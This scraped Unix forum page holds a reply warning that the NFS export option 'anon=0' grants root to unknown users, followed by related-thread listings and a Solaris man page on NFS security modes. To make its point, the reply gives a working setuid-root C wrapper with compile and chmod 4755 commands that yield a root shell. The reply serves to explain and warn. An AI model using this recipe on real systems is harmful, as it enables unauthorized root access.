Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Unable to write to a mounted NFS share
Top Forums UNIX for Dummies Questions & Answers Unable to write to a mounted NFS share Post 302917257 by achenle on Monday 15th of September 2014 01:53:16 PM
Old 09-15-2014
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
 

10 More Discussions You Might Find Interesting

1. AIX

Unable to mount NFS share during boot

Hello Everyone, I have a pseries machine running AIX 4.3.3 that has an invalid IP in /etc/hosts. During a boot the system hangs because it's trying to mount an NFS share to this invalid IP. I've tried to boot the system from a mksysb (not sure if the device was defined as rmt0) and AIX CD... (0 Replies)
Discussion started by: jlslhills
0 Replies

2. Shell Programming and Scripting

Apache/CGI Bin Accessing mounted SMB share

Hey Guys, I need to copy some files from my Apache server to SMB share ... copy $file,"/Volumes/v1/x/test/$datestamp$name$suffix" Unfortunately this command when executed from Apache/cgi-bin is not able to access mounted volumes .. is there anything that can be done about that ... Can... (1 Reply)
Discussion started by: NDxiak
1 Replies

3. Solaris

how to make nas share mounted in zones persistent across reboots?

there are few nas shares that would be mounted on the local zone. should i add an entry into the add an entry in zone.xml file so that it gets mounted automatically when the zone gets rebooted? or whats the correct way to get it mounted automatically when the zone reboots (2 Replies)
Discussion started by: chidori
2 Replies

4. AIX

I/O speed to CIFS mounted Windows Share

I have an AIX box that mounts a Windows share across subnets. When I try to copy a 100 MB file to it, it copies around 2 MB/s. If I copy to another Windows share on the same subnet it copies around 12 MB/s. All I have is gigabit networks so I would expect it to go well over 12 MB/s, which is the... (8 Replies)
Discussion started by: kah00na
8 Replies

5. UNIX for Dummies Questions & Answers

NFS mounted drive showing Write protected message

Hi We have two servers name A and B . I have a folder "Share" on A was NFS mounted to "B" server. I have set the ACL permissions using setfacl , so that both (One user from Server A and another user from Server B) users can read and write to the directory. Both users can create the... (0 Replies)
Discussion started by: rakeshkumar
0 Replies

6. Red Hat

Unable to access NFS share on Solaris Server from Linux client

Hi, I am trying to access a NFS shared directory on Solaris 10 Server from a client which is RHEL 4 Server. On the NFS Server, in /etc/dfs/, I added following line to dfstab file. share -F nfs -o rw /var/share & then ran the following svcadm -v enable -r... (3 Replies)
Discussion started by: SunilB2011
3 Replies

7. Shell Programming and Scripting

Mount NFS Share On NFS Client via bash script.

I need a help of good people with effective bash script to mount nfs shared, By the way I did the searches, since i haven't found that someone wrote a script like this in the past, I'm sure it will serve more people. The scenario as follow: An NFS Client with Daily CRON , running bash script... (4 Replies)
Discussion started by: Brian.t
4 Replies

8. HP-UX

Unable to write to NFS mounted directory

Hi, I have exported a few nfs mounts from one server to the nfs clients. This is my nfs server dfstab : # cat /etc/dfs/dfstab # place share(1M) commands here for automatic execution # on entering init state 3. # # share <pathname> # .e.g, # share -F... (3 Replies)
Discussion started by: anaigini45
3 Replies

9. IP Networking

Unable to search NFS Share

My customer has created a share on a Windows Server 2012 system and exported it as a NFS share. I can mount the share on a SCO system, but I only have read/write access. So I am unable to list the contents of the share. It is as if the directories had 0666 permissions. My customer says that this... (5 Replies)
Discussion started by: jgt
5 Replies

10. AIX

Unable to mount previously-working NFS share from NIM to LPAR

Right, now that I've finally worked out this website, I'll ask my question! I am having an absolute nightmare with NFS on AIX. I have used it many times, and I know what I'm doing, however I cannot fathom what is going on here. I have 2 LPARs, sitting on the same physical host. They are... (12 Replies)
Discussion started by: tmooredba
12 Replies

LEARN ABOUT CENTOS

nfssec

nfssec(5)																 nfssec(5)

NAME

       nfssec - overview of NFS security modes

       The  mount_nfs(1M)  and share_nfs(1M) commands each provide a way to specify the security mode to be used on an NFS file system through the
       sec=mode option. mode can be sys, dh, krb5, krb5i, krb5p, or none. These security modes can also be added to the automount maps. Note  that
       mount_nfs(1M)  and  automount(1M)  do  not  support  sec=none  at  this	time.  mount_nfs(1M) allows you to specify a single security mode;
       share_nfs(1M) allows you to specify multiple modes (or none). With multiple modes, an NFS client can choose any of the modes in the list.

       The sec=mode option on the share_nfs(1M) command line establishes the security mode of NFS servers. If the NFS connection uses the NFS Ver-
       sion 3 protocol, the NFS clients must query the server for the appropriate mode to use. If the NFS connection uses the NFS Version 2 proto-
       col, then the NFS client uses the default security mode, which is currently sys. NFS clients may force the use of a specific security  mode
       by specifying the sec=mode option on the command line. However, if the file system on the server is not shared with that security mode, the
       client may be denied access.

       If the NFS client wants to authenticate the NFS server using a particular (stronger) security mode, the client wants to specify	the  secu-
       rity  mode  to be used, even if the connection uses the NFS Version 3 protocol. This guarantees that an attacker masquerading as the server
       does not compromise the client.

       The NFS security modes are described below. Of these, the krb5, krb5i, krb5p modes use the Kerberos V5 protocol for authenticating and pro-
       tecting the shared filesystems. Before these can be used, the system must be configured to be part of a Kerberos realm. See SEAM(5).

       sys	Use  AUTH_SYS authentication. The user's UNIX user-id and group-ids are passed in the clear on the network, unauthenticated by the
		NFS server. This is the simplest security method and requires no additional administration. It is the default used by Solaris  NFS
		Version 2 clients and Solaris NFS servers.

       dh	Use a Diffie-Hellman public key system (AUTH_DES, which is referred to as AUTH_DH in the forthcoming Internet RFC).

       krb5	Use Kerberos V5 protocol to authenticate users before granting access to the shared filesystem.

       krb5i	Use Kerberos V5 authentication with integrity checking (checksums) to verify that the data has not been tampered with.

       krb5p	User  Kerberos V5 authentication, integrity checksums, and privacy protection (encryption) on the shared filesystem. This provides
		the most secure filesystem sharing, as all traffic is encrypted. It should be noted that performance might suffer on some  systems
		when using krb5p, depending on the computational intensity of the encryption algorithm and the amount of data being transferred.

       none	Use  null  authentication (AUTH_NONE). NFS clients using AUTH_NONE have no identity and are mapped to the anonymous user nobody by
		NFS servers. A client using a security mode other than the one with which a Solaris NFS server shares  the  file  system  has  its
		security  mode	mapped to AUTH_NONE. In this case, if the file system is shared with sec=none, users from the client are mapped to
		the anonymous user. The NFS security mode none is supported by share_nfs(1M), but not by mount_nfs(1M) or automount(1M).

       /etc/nfssec.conf 	       NFS security service configuration file

       See attributes(5) for descriptions of the following attributes:

       +-----------------------------+-----------------------------+
       |      ATTRIBUTE TYPE	     |	    ATTRIBUTE VALUE	   |
       |Availability		     |SUNWnfscr 		   |
       +-----------------------------+-----------------------------+

       automount(1M), mount_nfs(1M), share_nfs(1M), rpc_clnt_auth(3NSL), secure_rpc(3NSL), nfssec.conf(4), attributes(5)

       /etc/nfssec.conf lists the NFS security services. Do not edit this file. It is not intended to be user-configurable.

								    13 Apr 2005 							 nfssec(5)
All times are GMT -4. The time now is 04:34 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy